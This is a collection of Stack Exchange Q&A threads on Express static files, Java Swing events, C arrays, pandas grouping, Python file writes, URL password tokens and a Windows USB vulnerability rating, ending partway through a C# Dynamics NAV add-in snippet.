'\/styles'));\n<\/code>\nYou are actually giving it the name of folder i.e. styles not your suburl.\nAnswer: if your setup\n<code>myApp\n |\n |__ public\n | |\n | |__ stylesheets\n | | |\n | | |__ style.css\n | |\n | |___ img\n | |\n | |__ logo.png\n |\n |__ app.js\n<\/code>\nthen,\nput in app.js \n<code>app.use('\/static', express.static('public'));\n<\/code>\nand refer to your style.css: (in some .pug file):\n<code>link(rel='stylesheet', href='\/static\/stylesheets\/style.css')\n<\/code>\nComment: Why would you introduce a renaming step public -> static? I would say that is just more confusing extra information. But then again indirection is usually a good thing...\nAnswer: Try <code>'.\/public'<\/code> instead of <code>__dirname + '\/public'<\/code>.\nSimilarly, try <code>process.cwd() + '\/public'<\/code>.\nSometimes we lose track of the directories we are working with, its good to avoid assuming that files are located where we are telling express where they are.\nSimilarly, avoid assuming that in the depths of dependencies the path is being interpreted the same way at every level.\nComment: 100%. Always try to use `__dirname`, unless you have a case where you don't need to access the project files all the time.\nAnswer: <code>app.use(express.static(__dirname+'\/'));\n<\/code>\nThis worked for me, I tried using a public directory but it didn't work.\nBut in this case, we give access to the whole static files in the directory, hope it helps!\nAnswer: In addition to above, make sure the static file path begins with \/ (ex... \/assets\/css)... to serve static files in any directory above the main directory (\/main)\nComment: Addition to what above? State it in your answer (give credit to the person who posted it, if you have to). SO often changes the order of the answers so that all answers get seen and not the the first few. We don't know what you are talking about.\nAnswer: \nCreate a folder with 'public' name in Nodejs project\nfolder.\nPut index.html file into of Nodejs project folder.\nPut all script and css file into public \nfolder.\nUse <code>app.use( express.static('public'));<\/code>\nand in <code>index.html<\/code> correct path of scripts to <code><script type=\"text\/javascript\" src=\"\/javasrc\/example.js\"><\/script><\/code>\n\nAnd Now all things work fine.\nAnswer: static directory\ncheck the above image(static directory) for dir structure\n<code>const publicDirectoryPath = path.join(__dirname,'..\/public')\napp.use(express.static(publicDirectoryPath))\n\n\/\/ or\n\napp.use(\"\/\", express.static(publicDirectoryPath))\napp.use((req, res, next) => {\nres.sendFile(path.join(publicDirectoryPath,'index.html'))\n<\/code>\nAnswer: In your nodejs file\n<code>const express = require('express');\nconst app = express();\n\napp.use('\/static', express.static('path_to_static_folder'));\n<\/code>\nIn your pug file\n<code>...\nscript(type=\"text\/javascript\", src=\"static\/your_javascript_filename\")\n...\n<\/code>\nNote the \"static\" word. It must be same in nodejs file and pug file.\nAnswer: This is worked for me:\nServer:\n<code>app.use(express.static(\"public\"));\n<\/code>\nClient:\n<code><link href=\"css\/styles.css\" rel=\"stylesheet\">\n<img src=\"images\/210504.png\">\n<\/code>\nAnswer: Just encountered (and solved) a variation on this (node v16.16.0).\nfolder structure:\n<code> project\n apidoc\n src\n index.js (aka server.js, app.js)\n public\n images\n css\n<\/code>\nI am serving static content from 'public':\n<code> app.use(express.static('src\/public'))\n<\/code>\nand wanted to also serve the api docs from apidocs (one folder above the current folder). This wouldn't work:\n<code> app.use('\/apidoc', express.static('..\/apidoc')))\n \/\/ this didn't work either\n app.use('\/apidoc', express.static('\/absolute\/path\/to\/apidoc')))\n<\/code>\nThis was the solution:\n<code> import path from 'path'\n import { fileURLToPath } from 'url';\n const __filename = fileURLToPath(import.meta.url);\n const __dirname = path.dirname(__filename);\n\n app.use('\/apidoc', express.static(path.join(__dirname, '..\/apidoc')))\n app.use(express.static('src\/public'))\n<\/code>\nI suspect a path separator issue.\nAnswer: If your folder structure looks like this\n<code>myApp\n |\n |__ public\n | |\n | |__ stylesheets\n | | |\n | | |__ style.css\n | |\n | |___ img\n | |\n | |__ logo.png\n |\n |__ src\n |\n |__ app.js\n \n<\/code>\nuse the line below:\n<code>app.use('\/public', express.static(path.resolve('public')))\n<\/code>\nAnswer: <code>app.use('\/public\/',express.static(path.join('.\/public')));\n<\/code>\nI find this solution after finding it for hours it works for me!!\nAnswer: i just try this code and working\n<code>const exp = require('express');\nconst app = exp();\n\napp.use(exp.static(\"public\"));\n<\/code>\nand working,\nbefore (not working) :\n<code>const express = require('express');\nconst app = express();\napp.use(express.static(\"public\"));\n<\/code>\njust try\nComment: There's absolutely no change in this, lol\nComment: hehe,, this just work for me before, just share my case and i don't know why its work,\n","meta":{"source":"stackoverflow","title":"Express-js can't GET my static files, why?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fire an ActionEvent from a JPanel\n\nQuestion: I'm trying to repaint a simple massage in a panel by firing an ActionEvent. \nI Have a <code>MessagePanel<\/code> that extends <code>JPanel<\/code>, in which I defined an <code>addActionListener<\/code> method and a <code>processEvent<\/code> method to process the event:\n<code>import java.awt.Graphics;\nimport javax.swing.JPanel; \nimport java.util.*;\nimport java.awt.event.*;\n\npublic class MessagePanel extends JPanel {\n private String message = new Date().toString();\n ArrayList<ActionListener> actionListenerList;\n\n public MessagePanel(String message) {\n this.message = message;\n }\n\n public void setMessage(String message){\n this.message = message;\n }\n\n public void addActionListener(ActionListener listener) {\n if (actionListenerList == null) {\n actionListenerList = new ArrayList<>(2);\n }\n if (!actionListenerList.contains(listener)) {\n actionListenerList.add(listener);\n }\n }\n\n public void removeActionListener(ActionListener listener) {\n if (actionListenerList != null &&\n actionListenerList.contains(listener)) {\n actionListenerList.remove(listener);\n }\n }\n\n public void processEvent(ActionEvent e) {\n ArrayList<ActionListener> list;\n\n synchronized(this) {\n if (actionListenerList == null) {\n return;\n }\n list = (ArrayList<ActionListener>)actionListenerList.clone();\n }\n\n for (int i = 0; i < list.size(); i++) {\n ActionListener listener = (ActionListener)list.get(i);\n listener.actionPerformed(e);\n } \n }\n\n @Override\n protected void paintComponent(Graphics g){\n super.paintComponent(g);\n g.drawString(message, 0, 0);\n }\n}\n<\/code>\nHere's my test class:\n<code>import java.awt.event.*;\nimport javax.swing.*; \nimport java.util.*;\n\npublic TestMessaePanel extends JFrame {\n MessagePanel messagePanel = new MessagePanel(new Date().toString());\n\n public TestMessagePanel() {\n add(messagePanel);\n messagePanel.setCentered(true);\n\n messagePanel.addActionListener(new ActionListener(){\n @Override\n public void actionPerformed(ActionEvent e){\n messagePanel.setMessage(new Date().toString());\n }\n });\n }\n\n public static void main(String[] args) {\n JFrame frame = new TestMessagePanelWithActionEvent();\n frame.setSize(300, 200);\n frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n frame.setVisible(true);\n }\n}\n<\/code>\nI'm trying to have the panel repaint the current time with every click of the panel (without using any other event sets) but I can't figure out what event is supposed to fire and invoke my <code>processEvent<\/code> method. I'm not even really sure if I even need the <code>processEvent<\/code>, if I can just implement the process elsewhere. \n<code>EDIT WITH TEXTBOOK PROBLEM (below)\n<\/code>\n(Enable MessagePanel to fire ActionEvent) The MessagePanel class in\nListing 15.7 is a subclass of JPanel; it can fire a MouseEvent,\nKeyEvent, and ComponentEvent, but not an ActionEvent. Modify the\nMessagePanel class so that it can fire an ActionEvent when an instance\nof the MessagePanel class is clicked. Name the new class\nMessagePanelWithActionEvent. Test it with a Java applet that displays\nthe current time in a message panel whenever the message panel is\nclicked, as shown in Figure 36.9.\nAnswer: \nI'm trying to have the panel repaint the current time with every click of the panel (without using any other event sets) \n\nAn ActionListener is to be used only for events that are supposed to trigger it, such as a Timer or an AbstractButton. You should instead use a MouseListener for components that respond to mouse events.\n\nEdit Your assignment:\n\nThe MessagePanel class in Listing 15.7 is a subclass of JPanel; it can fire a MouseEvent, KeyEvent, and ComponentEvent, but not an ActionEvent. Modify the MessagePanel class so that it can fire an ActionEvent when an instance of the MessagePanel class is clicked. Name the new class MessagePanelWithActionEvent. Test it with a Java applet that displays the current time in a message panel whenever the message panel is clicked, as shown in Figure 36.9.\n\nYou're going to have to give your MessagePanel a MouseListener, one that on mousePressed calls your ActionListener(s). \nIn this MouseListener, you're going to have to create an ActionEvent object. Since this is an assignment, I'm not going to show you how to do this but instead will suggest that you go to the ActionEvent API to see what this object needs, and give it try.\nThen you will have to call <code>actionPerformed(...)<\/code> with the ActionEvent object you've just created on any ActionListeners that need to be called.\nComment: Yeah. I'm doing a textbook problem (dealing with implementing listeners an events). The problem clearly states that The JPanel uses, mouse events but not action events. So it asks you to implement the action event into a JPanel.\nComment: @peeskillet: please post the actual assignment verbatim in your question. Hopefully it's in English.\nComment: I have posted the problem at the bottom of my post\n","meta":{"source":"stackoverflow","title":"How to fire an ActionEvent from a JPanel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Passing three dimensional arrays into functions in C?\n\nQuestion: What is the best way to pass three dimensional arrays into functions in C?\nAnswer: It is required you have all but the left-most dimension to be defined at compile time.\n<code>#define DIM 5\n\nvoid do_something(float array[][DIM][DIM])\n{\n array[0][0][0] = 0;\n ...\n}\n<\/code>\nAnswer: <code>typedef<\/code> is your friend.\n<code>#include <stdio.h>\ntypedef int dimension1[20]; \/* define dimension1 as array of 20\n elements of type int *\/\ntypedef dimension1 dimension2[10]; \/* define dimension2 as array of 10\n elements of type dimension1 *\/\n\nint foo(dimension2 arr[], size_t siz);\n\nint main(void) {\n dimension2 dimension3[7] = {0}; \/* declare dimension3 as an array of 7\n elements of type dimension2 *\/\n dimension3[4][3][2] = 9999;\n dimension3[4][0][12] = 1;\n dimension3[3][8][18] = 42;\n\n printf(\"%d\\n\", foo(dimension3, 7));\n\n return 0;\n}\n\nint foo(dimension2 arr[], size_t siz) {\n int d1, d2, d3;\n int retval = 0;\n for (d3=0; d3<siz; d3++) {\n for (d2=0; d2<sizeof *arr \/ sizeof **arr; d2++) {\n for (d1=0; d1<sizeof **arr \/ sizeof ***arr; d1++) {\n retval += arr[d3][d2][d1];\n }\n }\n \/* edit: previous answer used definite types for the sizeof argument *\/\n \/\/for (d2=0; d2<sizeof (dimension2) \/ sizeof (dimension1); d2++) {\n \/\/ for (d1=0; d1<sizeof (dimension1) \/ sizeof (int); d1++) {\n \/\/ retval += arr[d3][d2][d1];\n \/\/ }\n \/\/}\n }\n return retval;\n}\n<\/code>\n\nEdit\nI don't like the use of definite types as the argument to <code>sizeof<\/code>.\nI added the way to get the sizes of the (sub-)arrays without directly specifying their types, but rather let the compiler infer the right type from the object definitions.\n\n2nd Edit\nAs Per Eckman notes typedef-ing \"bare\" arrays can be dangerous. Note that in the code above, I'm not passing arrays themselves to the function <code>foo<\/code>. I am passing a pointer to a \"lower level\" array.\n<code>foo()<\/code>, in the code above, accepts a pointer to an object of type <code>dimension2<\/code>. The <code>dimension3<\/code> object is an array of elements of <code>dimension2<\/code> type, not an object of <code>dimension3<\/code> type (which isn't even defined).\nBut remember Per Eckman's note.\nAnswer: Pass them as pointers.\nExample \n<code>int a[N][M][P];\n\nfoo( &a[0][0][0]);\n<\/code>\nwhere foo is \n<code>void foo( int*)\n<\/code>\nYou might need to pass the dimensions as well, so in such case you might need:\n<code>void foo( int*, int D1, int D2, int D3)\n<\/code>\nand call\n<code>foo( &a[0][0][0], N, M, P);\n<\/code>\nComment: Is the [0][0][0] necessary there?\nComment: @Cory, yes it first gets at the first int, and takes it address. That gives the resulting expression type `int*` instead of array pointer like `int(*)[N][M][P]`. This is a good hack in my opinion, it can improve program clarity by not having to deal with constants everywhere. But it's formally not guaranteed to work, so use it with care (not sure what could go wrong though).\nComment: @Cory, alternative ways to write that are `&***a`, `a[0][0]` and `**a`.\nAnswer: typedef-ing \"bare\" arrays can be dangerous.\nTry this\n<code>#include <stdio.h>\n\ntypedef char t1[10];\n\nvoid foo(t1 a) {\n t1 b;\n\n printf(\"%d %d\\n\", sizeof a, sizeof b);\n}\n\nint main(void) {\n t1 a;\n foo(a);\n return 0;\n}\n<\/code>\nOne would think that sizeof two variables of the same type would return the same size\nbut not in this case. For this reason it's a good practice to wrap typedef-ed arrays\nin a struct.\n<code>typedef struct {\n char x[10];\n} t1;\n<\/code>\n","meta":{"source":"stackoverflow","title":"Passing three dimensional arrays into functions in C?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Find relationships by timestamp and proximity to respective lat\/long\n\nQuestion: I'm new to python and I have hit a wall with this problem. I have a df with ID's, timestamp and lat \/longs. I need to find ID's that were are near each other by location and time. I've tried groupby with pandas, but the output just lumps everything under each unique ID. Is there a way to pair or group ID's by their proximity to each ID's lat\/longs (<50m) and timestamp (<=24hrs). I appreciate any help. Thanks!\n\nID\nTimestamp\nLatitude\nLongitude\n\n9269\n11\/23\/2021 23:59\n40.3291824\n-105.656204\n\n9269\n11\/19\/2021 23:59\n40.32294108\n-105.8062935\n\n9269\n11\/15\/2021 23:59\n40.13903661\n-105.5979048\n\n9269\n11\/15\/2021 23:39\n40.3291824\n-105.656204\n\n7359\n11\/11\/2021 23:59\n40.13903661\n-105.5979048\n\n7359\n11\/7\/2021 23:59\n40.32294108\n-105.8062935\n\n7359\n11\/7\/2021 23:39\n40.3291824\n-105.656204\n\n2259\n12\/6\/2021 0:02\n40.32294108\n-105.8062935\n\n2259\n12\/2\/2021 0:02\n40.3291824\n-105.656204\n\n2259\n11\/28\/2021 0:02\n40.13903661\n-105.5979048\nComment: You need to start write some code to calculate the distance between the points, and show what you have done so far so we can help.\nComment: Please provide enough code so others can better understand or reproduce the problem.\nAnswer: I will show you some steps that you can use to solve your problem.\n<code>import numpy as np\nimport pandas as pd\n\n# Creating a 2 dimensional numpy array\ndata = np.array([[1, 2,3,4,5,1, 2,3,4,5],[10, 20,30,40,50,10, 20,30,40,50],['s.40','s.50','s.40','s.50','s.40','s.50','s.40','s.50','s.40','s.50']])\n\n# Creating pandas dataframe from numpy array\ndf= pd.DataFrame({'Column1': data[0,:], 'Column2': data[1,:],'Column3': data[2,:]})\n<\/code>\nI create a dataframe from a numpy array.\nIn your dataframe in Timestamp Column you have data and time you need splint it\nand create a new column. You can do it as follow in my example:\n<code>def split_function(Column3):\n return Column3.split('.')[1]\n\ndf['split_column']=df.apply(lambda x: split_function(x.Column3), axis=1)\n<\/code>\nIn your case u can use a blank space ' ' to do your split in return Column3.split(' ')[1]\nThan u need garante that ur column have the right type so u can use:\n<code>df['Column1']=pd.to_numeric(df['Column1'])\ndf['Column2']=pd.to_numeric(df['Column2'])\n<\/code>\n(See also to_datetime() and to_timedelta()\nThan u need know how many interval you have, so you can use max and min method to help you find it:\nIn my example :\n<code>df['Column1'].max()\ndf['Column1'].min()\n\ndf['Column2'].max()\ndf['Column2'].min()\n<\/code>\nIt will return\n5\n1\nand\n50\n10\nLet supose i want a interval of 25 based on my Column 2,\nSo i will have 2 groups interval.\nFinally i just need select the rows based on a column condition\nyou can see more info about it here :\nHow do I select rows from a DataFrame based on column values?\n<code>list_dataframe_interval=[]\n\nfor i in range(2):\n print(i*25)\n print(type(i))\n\n df1=df.loc[(df['Column2'] >=i*25) & (df['Column1'] >= i*2.5)]\n df2=df1.loc[(i*25+25 >=df1['Column2']) & (i*2.5+2.5>=df1['Column1'])]\n \n\n \n list_dataframe_interval.append(df2)\n<\/code>\nSo you can see the dataframe in this list\nlist_dataframe_interval[0]\nlist_dataframe_interval[1]\n","meta":{"source":"stackoverflow","title":"Find relationships by timestamp and proximity to respective lat\/long","dup_signals":{}},"subset":"stackexchange"} +{"text":"company is sending md5 string via GET['password'] dangerous?\n\nQuestion: So, this big, reknown company (you all heard off) is sending md5 encrypted strings (with GET key: password) over HTTP. \nI accidentally came over it since I wanted to use jnlp on a non-windows machine. And I am curious. Is it by definition insecure to work like this, or can it be safe when one uses SALT and other stuff alike?\nThe URL looks like this: url\/folder\/page\/?login=[USERNAME]&password=[MD5-String]\nThis URL is also stored in the corresponding .jnlp file.\nI hashed my password to MD5 and it is not the same as the password in the URL.\nFirst and foremost, I am curious. I do not have the skills to exploit this (if it where possible), and don't even want to exploit it. If you guys think I should notify the company in question: I will do so.\nThanks! \nComment: what happens if you log out and use the same URL? Or use it from a different machine? It may be salted with a session ID, or something like that.\nComment: How do you know that the \"MD5-String\" is actually an MD5? Just because it encodes 16 bytes doesn't mean it is an MD5. This **might** have been reasonable (not great, but reasonable) if it was over HTTPS \u2014 it depends what that string is and what is done with it on the server side. Does the string change if you change your password? If you use the same password on a different account?\nComment: Yes this works fine.\nComment: @gilles You are right again. It is not a password. Changing my password didn't result in a different string :P Sorry for the noob question, but can I mark you comment as the answer?\nComment: Sending a password over http, even when hashed with MD5, is a bad idea. It's important to use https.\nComment: Are we not sending passwords over HTTP all day (regardless whether they are hashed)? Forgive my stupidity, but I rarely see HTTPS protocol on normal logins.\nAnswer: \nI am curious. Is it by definition insecure to work like this.\n\nNo. Submitting passwords via GET is not fundamentally less secure than submitting them via POST (which is what every other site does). It does mean that the \"password\" is stored unencrypted, but if done right, that password that they're storing not your actual login password but rather a password used specifically for this purpose. In fact, the string you see that you assume is MD5 may actually be the password itself, generated at random. \nA authentication token passed in a URL is problematic because it (a) is easy to copy, even accidentally, (b) is cached, (c) shows up in referrer strings, (d) shows up in logs, (e) offers little in the way of actual authentication. Instead, of doing true authentication, the URL itself is the key.\nOn the other hand, this may be exactly what the company wants. If you want a protected resource to be accessible to anyone who knows the correct URL, then this is how you do it.\nIf they simply called it \"access token\" instead of \"password\", would you suddenly feel better about it?\n\nIf you guys think I should notify the company in question: I will do so.\n\nIf that will make you feel better, then go ahead and tell them. They already know, of course, since they built it. It'd be like notifying someone that their car is blue.\nComment: Well, since it said 'password' I immediately assumed it was a password. As turned out: I was wrong: Changing passwords does not influence the string.\n\nAnd, of course, the last few sentences were only my way of saying I'm not a creepy hacker guy (or probably script kiddy in my case) who wants to exploit and hack into these systems.\n\nThanks for your answer!\n","meta":{"source":"security.stackexchange","title":"company is sending md5 string via GET['password'] dangerous?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Python writelines() and write() huge time difference\n\nQuestion: I was working on a script which reading a folder of files(each of size ranging from 20 MB to 100 MB), modifies some data in each line, and writes back to a copy of the file.\n<code>with open(inputPath, 'r+') as myRead:\n my_list = myRead.readlines()\n new_my_list = clean_data(my_list)\nwith open(outPath, 'w+') as myWrite:\n tempT = time.time()\n myWrite.writelines('\\n'.join(new_my_list) + '\\n')\n print(time.time() - tempT)\nprint(inputPath, 'Cleaning Complete.')\n<\/code>\nOn running this code with a 90 MB file (~900,000 lines), it printed 140 seconds as the time taken to write to the file. Here I used <code>writelines()<\/code>. So I searched for different ways to improve file writing speed, and in most of the articles that I read, it said <code>write()<\/code> and <code>writelines()<\/code> should not show any difference since I am writing a single concatenated string. I also checked the time taken for only the following statement:\n<code>new_string = '\\n'.join(new_my_list) + '\\n'\n<\/code>\nAnd it took only 0.4 seconds, so the large time taken was not because of creating the list.\nJust to try out <code>write()<\/code> I tried this code:\n<code>with open(inputPath, 'r+') as myRead:\n my_list = myRead.readlines()\n new_my_list = clean_data(my_list)\nwith open(outPath, 'w+') as myWrite:\n tempT = time.time()\n myWrite.write('\\n'.join(new_my_list) + '\\n')\n print(time.time() - tempT)\nprint(inputPath, 'Cleaning Complete.')\n<\/code>\nAnd it printed 2.5 seconds. Why is there such a large difference in the file writing time for <code>write()<\/code> and <code>writelines()<\/code> even though it is the same data? Is this normal behaviour or is there something wrong in my code? The output file seems to be the same for both cases, so I know that there is no loss in data.\nComment: upvote for finding a twisted way of using writelines with expected result and finding an unexpected caveat.\nComment: Also my clean_data() function strips each row, so extra newlines are removed.\nAnswer: <code>file.writelines()<\/code> expects an iterable of strings. It then proceeds to loop and call <code>file.write()<\/code> for each string in the iterable. In Python, the method does this:\n<code>def writelines(self, lines)\n for line in lines:\n self.write(line)\n<\/code>\nYou are passing in a single large string, and a string is an iterable of strings too. When iterating you get individual characters, strings of length 1. So in effect you are making <code>len(data)<\/code> separate calls to <code>file.write()<\/code>. And that is slow, because you are building up a write buffer a single character at a time.\nDon't pass in a single string to <code>file.writelines()<\/code>. Pass in a list or tuple or other iterable instead.\nYou could send in individual lines with added newline in a generator expression, for example:\n<code> myWrite.writelines(line + '\\n' for line in new_my_list)\n<\/code>\nNow, if you could make <code>clean_data()<\/code> a generator, yielding cleaned lines, you could stream data from the input file, through your data cleaning generator, and out to the output file without using any more memory than is required for the read and write buffers and however much state is needed to clean your lines:\n<code>with open(inputPath, 'r+') as myRead, open(outPath, 'w+') as myWrite:\n myWrite.writelines(line + '\\n' for line in clean_data(myRead))\n<\/code>\nIn addition, I'd consider updating <code>clean_data()<\/code> to emit lines with newlines included.\nComment: `myWrite.writelines('\\n'.join(my_list) + '\\n')` could just be `myWrite.writelines(\"{}\\n\".format(x) for x in my_list)` so that would be even faster; no list to build.\nComment: @Jean-Fran\u00e7oisFabre: which is why I state to pass in a list or tuple *or other iterable*. :-)\nComment: @Jean-Fran\u00e7oisFabre: it may just be a memory-saving measure however, as the buffer still concatenates those lines until it is full. It would help if `clean_data()` was a generator.\nComment: Thanks @MartijnPieters I think I've got a much better understanding of what python considers as iterables now. As of now my clean_data takes a list of all the rows from the input file, makes changes to each row, and returns a list of modified rows. Would it be more efficient to clean each row and write it immediately, or collect the rows into a list and write them all together as I am currently doing in my code?\nComment: @ArjunBalgovind: it'd be more memory efficient to clean each row as you read it, then use `yield` to pass on the result to the next step. Memory efficiency can translate into overall performance improvement if the file is large enough (as memory allocations take time too, and you want to avoid memory contention), and I\/O slowness smoothes over the performance difference for small files.\nComment: So I shouldn't use readlines? So you suggest I change my script to read a line, clean it, and write it to the new file, and repeat this for each line in the input, is that correct?\nComment: @ArjunBalgovind: you can iterate directly over the file object, and efficiently read the file line by line. `.readlines()` reads the whole file into memory, but if you don't need random access to any given line to do your data cleaning job, that's entirely overkill and a waste of memory.\nComment: @ArjunBalgovind: and by iterating directly over the file, cleaning a single line at a time, then writing it out to the output file, you achieve the memory benefits I mentioned, yes. This is going to be efficient, because both reading and writing uses buffers (provided you don't process things one character at a time).\nComment: Thanks a lot for all this help :D\nComment: If the cleaning of a single line doesn't need knowledge from previous lines it's also possible to write a function that cleans a single line and use `map()`: `out_file.writelines(map(clean_line, in_file))`. (Assuming `clean_line()` includes the trailing `'\\n'` in its result.)\nAnswer: as a complement to Martijn answer, the best way would be to avoid to build the list using <code>join<\/code> in the first place\nJust pass a generator comprehension to <code>writelines<\/code>, adding the newline in the end: no unnecessary memory allocation and no loop (besides the comprehension)\n<code>myWrite.writelines(\"{}\\n\".format(x) for x in my_list)\n<\/code>\nComment: yes. this is about 30% faster than `write()` at the expense of needing to create `my_list` initially https:\/\/gist.github.com\/chapmanjacobd\/8ec346a7a9f4e78547e7f06043fce9bb\nAnswer: 'write(arg)' method expects string as its argument. So once it calls, it will directly writes. this is the reason it is much faster.\nwhere as if you are using <code>writelines()<\/code> method, it expects list of string as iterator. so even if you are sending data to <code>writelines<\/code>, it assumes that it got iterator and it tries to iterate over it. so since it is an iterator it will take some time to iterate over and write it.\nIs that clear ?\nComment: @ArjunBalgovind: a single string is an iterable of separate characters.\nComment: Yeah, you might want to suggest something like `myWrite.writelines(['\\n'.join(my_list) + '\\n'])`\nComment: But its still a single string isn't it? It will iterate over 1 value? How will that affect write speed?\nComment: @mgilson myWrite.writelines(['\\n'.join(my_list) + '\\n']) worked just as good, as myWrite.write(). I understand now why writelines was so slow.\n","meta":{"source":"stackoverflow","title":"Python writelines() and write() huge time difference","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is the aggregate severity rating of \"Important\" for MS13-027 too low?\n\nQuestion: The Security Bulletin states that the \"Maximum Security Impact\" is \"Elevation of Privilege\"; however, the SRD blog post says code execution is possible. Additionally, SRD says \"Other software that enables low-level pass-through of USB device enumeration may open additional avenues of exploitation that do not require direct physical access to the system\".\nFurther, the March Summary indicates that an exploit is likely for this vulnerability.\nGiven all of this, how is the \"Aggregate Severity Rating\" not Critical?\nOnce scenario that I'm now worried about is the maid walking around at night, owning all of the desktops on my trading floor, or any other Windows based corporate device.\nEDIT: Here is the white paper the researcher published on the topic of USB.\nAnswer: I'd say that as @AJHenderson says their rating of Important is down to the requirement for physical access.\nThat said as with any vulnerability the actual risk to an environment needs to be assessed based on the likely threats to systems and their accessibility. In some companies the risk of this attack will be quite low (e.g. datacentre environments where physical access to systems is extremely limited), whereas in others it will be high where access is easy (e.g. any kiosk style environments that allow USB access) or where likely threat actors can get physical access to systems (e.g. financial organisations who may allow contract staff like cleaners physical access to systems (think sumitomo bank))\nUltimately I'd say that the Microsoft rating should just be seen as a starting point for a companies risk assessment and they need to take account of their own environment before deciding on how severely to treat a given issue.\nComment: I wish I could \"accept\" two answers. Your point about risk assessment in the context of the organization is spot on.\nAnswer: I believe it may be due to the fact that it requires local access. Without low level passthrough's to USB, this can't be remotely exploited so the potential risk is fairly limited. High security environments should already have physical security to prevent rogue USB devices being installed and lower security is less of a critical target for a local targeted attack. It's probably the limitation of scope as opposed to the limited potential harm to one particular system.\nWhether that is a good way to measure severity or not is hard to say, but that is my best guess as to where they are coming from.\nComment: @JoeGatt - yes, I made mention of that in my post. Low level pass through of that type is not common. It is mostly seen with things like VMs or things where a virtual driver is used for a USB port. It is a rare case and would require some other means of exploit to make such a low level device on a system that doesn't already have a software device configured to appear as a USB host.\nComment: In the SRD blog post they mention that you do not necessarily need local access. Per the blog post \"Other software that enables low-level pass-through of USB device enumeration may open additional avenues of exploitation that do not require direct physical access to the system\". I interpret that to mean that a malicious executable could crafted to exploit this. So a logged in user must click on something to be owned, or someone would need physical access to own a machine with no one logged in.\nComment: Interesting perspective. I hadn't considered the difficulty in what it would take to create malware to install a software device configured to appear as a USB host.\nAnswer: It is the same case of Redhat explaining in their blog post why they use CVSS and don't take into account the environment and temporal (time based) values. Your question is directly related to this same procedure.\nThe reason why microsoft has not flagged this as overall critical is because of the environmental factor. A lot of organizations already have physcial security in place with with zero tolerance for USB devices. Even if code execution is possible, it is not remote. Attacker needs to have physical access to the machine to trigger the bug. Although just plugging in a flash drive is fast, but I think if you have phyiscal access to the system, USB is not the only vector you can compromise.\nTherefore, taking into account the overall exploitation vector and the fact what new attack avenues this particular bug can introduce in an environment, the vulnerability is not rated as critical. \nComment: Per the SRD blog post \"This update represents an expansion of our risk assessment methodology to recognize vulnerabilities that may require physical access, but do not require a valid logon session\". Physical environment is now in scope for Microsoft advisories. I think @AJHenderson answered the question best.\n","meta":{"source":"security.stackexchange","title":"Is the aggregate severity rating of \"Important\" for MS13-027 too low?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Control Add-In for Nav Matrix of textbox(bidimensional) in C#\n\nQuestion: I need help creating a CtrlAddIn for Dynamics NAV using C#\nI am quite new to matrix and c#, i am using WinForm and VisualStudio to create a DLL. \nHere is part of the code:\nregion Fonctions pilot\u00e9es depuis Dynamics\n<code> \/\/ Tout effacer\n\n [ApplicationVisible]\n public void CleanPanel()\n {\n MainPanel.Controls.Clear(); \/\/Tous les elements seront effac\u00e9s\n }\n\n \/\/ Gestion des r\u00f4les\n\n [ApplicationVisible]\n public void AjouterRole(string NameL, string idRoleL, int posRoleL)\n { \n TextBox tb = new TextBox();\n \/\/Random random = new Random();\n ToolTip TTL = new ToolTip();\n String TooltipL;\n\n \/\/int randRed = random.Next(1, 255);\n \/\/int randGreen = random.Next(1, 255);\n \/\/int randBlue = random.Next(1, 255);\n\n \/\/tb.BackColor = Color.FromArgb(randRed, randGreen, randBlue);\n tb.BackColor = Color.Bisque;\n tb.Name = idRoleL;\n \/\/si le texte est plus grand, je mets ...\n tb.Text = NameL;\n if (tb.TextLength > 7)\n {\n string nameO = NameL.Substring(0, 7);\n string points = \"...\";\n tb.Text = string.Concat(nameO + points);\n }\n else\n {\n tb.Text = NameL;\n }\n tb.AllowDrop = true; \/\/pour le drag and drop \n tb.Multiline = true;\/\/pour pouvoir avoir des textboxes de taille differente\n tb.ScrollBars = ScrollBars.None; \/\/pour enlever les scrollbars dans tout les textboxes\n tb.HideSelection = true;\/\/pour ne pas avoir le focus dans le precedent textbox\n tb.Size = new Size(70, 60);\n tb.Left = posRoleL * 70;\n tb.Visible = true;\n tb.Cursor = Cursors.Hand;\n \/\/wrap pour que le texte n'aille pas a la ligne et tooltip pour voir le text\n TooltipL = NameL;\n tb.WordWrap = false;\n TTL.SetToolTip(tb, TooltipL);\n \/\/evenement pour le DRAG AND DROP\n \/\/1 Je gere le drag pour pouvoir le bouger\n tb.MouseDown += (senderL, eL) => tb.DoDragDrop(tb.Text, DragDropEffects.Move);\n tb.DragEnter += (senderL, eL) => { eL.Effect = DragDropEffects.Move; };\n \/\/EventControlAddin(3, idRoleL.PadRight(10) + \";\" + (string)posRoleL.ToString());\n \/\/2 Je gere le drop pour pouvoir bouger le controle\n tb.DragDrop += (senderL, eL) => { tb.Text = eL.Data.GetData(DataFormats.Text).ToString(); EventControlAddin(3, idRoleL.PadRight(10) + \";\" + (string)posRoleL.ToString()); };\n \/\/evenement pour pouvoir supprimer un role\n tb.MouseEnter += IlumineRole;\n tb.MouseLeave += Eteint;\n \/\/evenement pour modifier le role\n tb.DoubleClick += (senderL, eL) => EventControlAddin(6, tb.Name);\n\n MainPanel.Controls.Add(tb);\n\n }\n\n [ApplicationVisible]\n public void AjouterTotalRole(string NameL, string idRoleL, int posRoleL, string dureeL, string coutL)\n { \n \/\/ Textbox\n TextBox tb = new TextBox();\n tb.Name = idRoleL;\n tb.Text = NameL;\n int indexMaxRoles = 99;\/\/somme de toutes les lignes + 1 \n \/\/ Je dois mettre un tooltip pour comprendre\n ToolTip TTL = new ToolTip();\n String TooltipLCout = \"Totaux des r\u00f4les en dur\u00e9e et en co\u00fbt.\";\n \/\/Panel contenant les labels\n Panel pn = new Panel();\n pn.Size = new Size(70, 60);\n pn.BackColor = Color.Azure;\n pn.BorderStyle = BorderStyle.FixedSingle;\n pn.Left = posRoleL * 70;\n pn.Top = indexMaxRoles + 1; \/\/Il faut qu'il soit a la casse finale\n\n Label lb_Duree = new Label(); \n lb_Duree.Text = \"Dur\u00e9e:\" + dureeL;\n \/\/lb_Duree.Width = 60;\n Label lb_Cout = new Label();\n lb_Cout.Text = 